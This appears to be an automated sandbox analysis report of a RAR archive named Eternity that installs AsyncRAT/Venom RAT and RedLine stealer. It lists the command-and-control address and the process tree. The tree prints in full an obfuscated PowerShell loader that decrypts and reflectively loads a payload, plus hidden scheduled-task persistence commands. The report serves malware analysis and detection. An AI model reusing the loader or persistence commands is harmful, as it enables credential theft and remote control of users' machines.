Resubmissions

09/03/2024, 19:26

240309-x5yyfsgb77 10

09/03/2024, 19:03

240309-xqftbsff87 10

Analysis

  • max time kernel
    137s
  • max time network
    176s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09/03/2024, 19:26

General

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Growtopia

C2

163.5.215.225:1602

Mutex

hoosnuxddbjezlt

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

redline

Botnet

Growtopia

C2

163.5.215.225:37552

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 1 IoCs
  • Async RAT payload 1 IoCs
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 42 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 48 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://gofile.io/d/SD0Axa
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2836
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaf09246f8,0x7ffaf0924708,0x7ffaf0924718
      2⤵
        PID:2236
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,4437421732922727287,606222553475672080,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2
        2⤵
          PID:3608
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,4437421732922727287,606222553475672080,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2464 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:1892
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2064,4437421732922727287,606222553475672080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2828 /prefetch:8
          2⤵
            PID:4596
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,4437421732922727287,606222553475672080,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
            2⤵
              PID:1676
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,4437421732922727287,606222553475672080,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
              2⤵
                PID:3652
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,4437421732922727287,606222553475672080,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4144 /prefetch:1
                2⤵
                  PID:1348
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,4437421732922727287,606222553475672080,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:1
                  2⤵
                    PID:2280
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,4437421732922727287,606222553475672080,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1
                    2⤵
                      PID:4184
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,4437421732922727287,606222553475672080,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5464 /prefetch:1
                      2⤵
                        PID:4964
                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,4437421732922727287,606222553475672080,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5680 /prefetch:8
                        2⤵
                          PID:4892
                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,4437421732922727287,606222553475672080,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5680 /prefetch:8
                          2⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:912
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,4437421732922727287,606222553475672080,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4236 /prefetch:1
                          2⤵
                            PID:5036
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,4437421732922727287,606222553475672080,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4152 /prefetch:1
                            2⤵
                              PID:4440
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,4437421732922727287,606222553475672080,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5872 /prefetch:1
                              2⤵
                                PID:1692
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,4437421732922727287,606222553475672080,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5896 /prefetch:1
                                2⤵
                                  PID:1788
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,4437421732922727287,606222553475672080,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5232 /prefetch:1
                                  2⤵
                                    PID:3248
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,4437421732922727287,606222553475672080,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5756 /prefetch:1
                                    2⤵
                                      PID:1168
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2064,4437421732922727287,606222553475672080,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5948 /prefetch:8
                                      2⤵
                                        PID:3524
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2064,4437421732922727287,606222553475672080,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5652 /prefetch:8
                                        2⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:3952
                                      • C:\Program Files\7-Zip\7zFM.exe
                                        "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Eternity.rar"
                                        2⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5172
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
                                      1⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:4672
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffaf09246f8,0x7ffaf0924708,0x7ffaf0924718
                                        2⤵
                                          PID:2200
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1852,3322398035682761999,5784789618303227246,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3
                                          2⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:452
                                      • C:\Windows\System32\CompPkgSrv.exe
                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                        1⤵
                                          PID:4976
                                        • C:\Windows\System32\CompPkgSrv.exe
                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                          1⤵
                                            PID:4812
                                          • C:\Windows\System32\rundll32.exe
                                            C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                            1⤵
                                              PID:1304
                                            • C:\Program Files\7-Zip\7zG.exe
                                              "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Eternity\" -spe -an -ai#7zMap22196:78:7zEvent29476
                                              1⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5132
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Eternity\Update.bat" "
                                              1⤵
                                                PID:548
                                                • C:\Users\Admin\Downloads\Eternity\Update.bat.exe
                                                  "Update.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_RUxtm = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\Eternity\Update.bat').Split([Environment]::NewLine);foreach ($_CASH_LNxNp in $_CASH_RUxtm) { if ($_CASH_LNxNp.StartsWith(':: @')) { $_CASH_yPRQJ = $_CASH_LNxNp.Substring(4); break; }; };$_CASH_yPRQJ = [System.Text.RegularExpressions.Regex]::Replace($_CASH_yPRQJ, '_CASH_', '');$_CASH_muQWL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_yPRQJ);$_CASH_JXFbf = New-Object System.Security.Cryptography.AesManaged;$_CASH_JXFbf.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_JXFbf.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_JXFbf.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x3+Q7vlJHhTCSNOf1jrLe0x+EhsJz3GnAnKuRYsrqbo=');$_CASH_JXFbf.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zmeeMIGlZmSaE3quwUWDog==');$_CASH_QulMc = $_CASH_JXFbf.CreateDecryptor();$_CASH_muQWL = $_CASH_QulMc.TransformFinalBlock($_CASH_muQWL, 0, $_CASH_muQWL.Length);$_CASH_QulMc.Dispose();$_CASH_JXFbf.Dispose();$_CASH_yNIQt = New-Object System.IO.MemoryStream(, $_CASH_muQWL);$_CASH_qBdio = New-Object System.IO.MemoryStream;$_CASH_QiMcy = New-Object System.IO.Compression.GZipStream($_CASH_yNIQt, [IO.Compression.CompressionMode]::Decompress);$_CASH_QiMcy.CopyTo($_CASH_qBdio);$_CASH_QiMcy.Dispose();$_CASH_yNIQt.Dispose();$_CASH_qBdio.Dispose();$_CASH_muQWL = $_CASH_qBdio.ToArray();$_CASH_GqFfC = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_muQWL);$_CASH_XJUrC = $_CASH_GqFfC.EntryPoint;$_CASH_XJUrC.Invoke($null, (, [string[]] ('')))
                                                  2⤵
                                                  • Checks computer location settings
                                                  • Executes dropped EXE
                                                  • Modifies registry class
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5692
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\Downloads\Eternity\Update')
                                                    3⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:408
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_732_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_732.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                    3⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:5884
                                                  • C:\Windows\System32\WScript.exe
                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_732.vbs"
                                                    3⤵
                                                    • Checks computer location settings
                                                    PID:4840
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_732.bat" "
                                                      4⤵
                                                        PID:4720
                                                        • C:\Users\Admin\AppData\Roaming\startup_str_732.bat.exe
                                                          "startup_str_732.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_RUxtm = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_732.bat').Split([Environment]::NewLine);foreach ($_CASH_LNxNp in $_CASH_RUxtm) { if ($_CASH_LNxNp.StartsWith(':: @')) { $_CASH_yPRQJ = $_CASH_LNxNp.Substring(4); break; }; };$_CASH_yPRQJ = [System.Text.RegularExpressions.Regex]::Replace($_CASH_yPRQJ, '_CASH_', '');$_CASH_muQWL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_yPRQJ);$_CASH_JXFbf = New-Object System.Security.Cryptography.AesManaged;$_CASH_JXFbf.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_JXFbf.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_JXFbf.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x3+Q7vlJHhTCSNOf1jrLe0x+EhsJz3GnAnKuRYsrqbo=');$_CASH_JXFbf.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zmeeMIGlZmSaE3quwUWDog==');$_CASH_QulMc = $_CASH_JXFbf.CreateDecryptor();$_CASH_muQWL = $_CASH_QulMc.TransformFinalBlock($_CASH_muQWL, 0, $_CASH_muQWL.Length);$_CASH_QulMc.Dispose();$_CASH_JXFbf.Dispose();$_CASH_yNIQt = New-Object System.IO.MemoryStream(, $_CASH_muQWL);$_CASH_qBdio = New-Object System.IO.MemoryStream;$_CASH_QiMcy = New-Object System.IO.Compression.GZipStream($_CASH_yNIQt, [IO.Compression.CompressionMode]::Decompress);$_CASH_QiMcy.CopyTo($_CASH_qBdio);$_CASH_QiMcy.Dispose();$_CASH_yNIQt.Dispose();$_CASH_qBdio.Dispose();$_CASH_muQWL = $_CASH_qBdio.ToArray();$_CASH_GqFfC = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_muQWL);$_CASH_XJUrC = $_CASH_GqFfC.EntryPoint;$_CASH_XJUrC.Invoke($null, (, [string[]] ('')))
                                                          5⤵
                                                          • Executes dropped EXE
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:916
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\startup_str_732')
                                                            6⤵
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:3520
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Eternity\FIxer.bat" "
                                                  1⤵
                                                    PID:5844
                                                    • C:\Users\Admin\Downloads\Eternity\FIxer.bat.exe
                                                      "FIxer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_RbGXZ = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\Eternity\FIxer.bat').Split([Environment]::NewLine);foreach ($_CASH_yShvh in $_CASH_RbGXZ) { if ($_CASH_yShvh.StartsWith(':: @')) { $_CASH_htVii = $_CASH_yShvh.Substring(4); break; }; };$_CASH_htVii = [System.Text.RegularExpressions.Regex]::Replace($_CASH_htVii, '_CASH_', '');$_CASH_gxaUQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_htVii);$_CASH_tNFYv = New-Object System.Security.Cryptography.AesManaged;$_CASH_tNFYv.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_tNFYv.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_tNFYv.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('stOdklJYreIdm/YGNy+nWCCs5XfEGhL2PqU03YNrbO4=');$_CASH_tNFYv.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0108NVZ5xw9HpRSjSqRPXQ==');$_CASH_KEZfr = $_CASH_tNFYv.CreateDecryptor();$_CASH_gxaUQ = $_CASH_KEZfr.TransformFinalBlock($_CASH_gxaUQ, 0, $_CASH_gxaUQ.Length);$_CASH_KEZfr.Dispose();$_CASH_tNFYv.Dispose();$_CASH_nWslU = New-Object System.IO.MemoryStream(, $_CASH_gxaUQ);$_CASH_ZGTxp = New-Object System.IO.MemoryStream;$_CASH_TSmhI = New-Object System.IO.Compression.GZipStream($_CASH_nWslU, [IO.Compression.CompressionMode]::Decompress);$_CASH_TSmhI.CopyTo($_CASH_ZGTxp);$_CASH_TSmhI.Dispose();$_CASH_nWslU.Dispose();$_CASH_ZGTxp.Dispose();$_CASH_gxaUQ = $_CASH_ZGTxp.ToArray();$_CASH_uxxtl = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_gxaUQ);$_CASH_fbfIS = $_CASH_uxxtl.EntryPoint;$_CASH_fbfIS.Invoke($null, (, [string[]] ('')))
                                                      2⤵
                                                      • Checks computer location settings
                                                      • Executes dropped EXE
                                                      • Modifies registry class
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:6084
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\Downloads\Eternity\FIxer')
                                                        3⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:4236
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_17_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_17.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                        3⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:4956
                                                      • C:\Windows\System32\WScript.exe
                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_17.vbs"
                                                        3⤵
                                                        • Checks computer location settings
                                                        PID:4928
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_17.bat" "
                                                          4⤵
                                                            PID:1376
                                                            • C:\Users\Admin\AppData\Roaming\startup_str_17.bat.exe
                                                              "startup_str_17.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_RbGXZ = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_17.bat').Split([Environment]::NewLine);foreach ($_CASH_yShvh in $_CASH_RbGXZ) { if ($_CASH_yShvh.StartsWith(':: @')) { $_CASH_htVii = $_CASH_yShvh.Substring(4); break; }; };$_CASH_htVii = [System.Text.RegularExpressions.Regex]::Replace($_CASH_htVii, '_CASH_', '');$_CASH_gxaUQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_htVii);$_CASH_tNFYv = New-Object System.Security.Cryptography.AesManaged;$_CASH_tNFYv.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_tNFYv.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_tNFYv.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('stOdklJYreIdm/YGNy+nWCCs5XfEGhL2PqU03YNrbO4=');$_CASH_tNFYv.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0108NVZ5xw9HpRSjSqRPXQ==');$_CASH_KEZfr = $_CASH_tNFYv.CreateDecryptor();$_CASH_gxaUQ = $_CASH_KEZfr.TransformFinalBlock($_CASH_gxaUQ, 0, $_CASH_gxaUQ.Length);$_CASH_KEZfr.Dispose();$_CASH_tNFYv.Dispose();$_CASH_nWslU = New-Object System.IO.MemoryStream(, $_CASH_gxaUQ);$_CASH_ZGTxp = New-Object System.IO.MemoryStream;$_CASH_TSmhI = New-Object System.IO.Compression.GZipStream($_CASH_nWslU, [IO.Compression.CompressionMode]::Decompress);$_CASH_TSmhI.CopyTo($_CASH_ZGTxp);$_CASH_TSmhI.Dispose();$_CASH_nWslU.Dispose();$_CASH_ZGTxp.Dispose();$_CASH_gxaUQ = $_CASH_ZGTxp.ToArray();$_CASH_uxxtl = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_gxaUQ);$_CASH_fbfIS = $_CASH_uxxtl.EntryPoint;$_CASH_fbfIS.Invoke($null, (, [string[]] ('')))
                                                              5⤵
                                                              • Executes dropped EXE
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:5748
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\startup_str_17')
                                                                6⤵
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:6000

                                                    Network

                                                    MITRE ATT&CK Enterprise v15

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                      Filesize

                                                      3KB

                                                      MD5

                                                      6b8559593a74eb3b15c53a9fac9a469f

                                                      SHA1

                                                      13af213d1417edf30c03f76f9242c1975b2e4e74

                                                      SHA256

                                                      e053d1faabd6b36371f452e79cf70591cf45403a671746136a87198694a8fdb9

                                                      SHA512

                                                      699b11eda97866809b696c96304bc218d7b72623fd537f83721f36a6c617d854fda7b6f01f7cb0bc0d55189c386e9b9fe6d111bb7c76cce492572b0a9961e974

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                      Filesize

                                                      152B

                                                      MD5

                                                      73c8d54f775a1b870efd00cb75baf547

                                                      SHA1

                                                      33024c5b7573c9079a3b2beba9d85e3ba35e6b0e

                                                      SHA256

                                                      1ce86be0476a2a9e409fcb817126285bc4ad83efd03ee06a2f86910fe18d4d94

                                                      SHA512

                                                      191344f5830cfea68499bd49073ffa7215a42265a9629d203d07849b2417c0ffdbdbf288bf2c669e91009a0d7e8bd6a6b378c92fc283049141231ca7bf4da3b8

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                      Filesize

                                                      152B

                                                      MD5

                                                      4b206e54d55dcb61072236144d1f90f8

                                                      SHA1

                                                      c2600831112447369e5b557e249f86611b05287d

                                                      SHA256

                                                      87bf9a4c3564eb3d8bef70450da843ae6003271222734c4d28d9961c52782e0b

                                                      SHA512

                                                      c9e8d2452368873e0622b002a0c2f8a2714b5897a09475738a9f9740122d716a9f0d3841725230d58e039564c820d32a6f3a675a7bb04bd163bab53dcb4e22f2

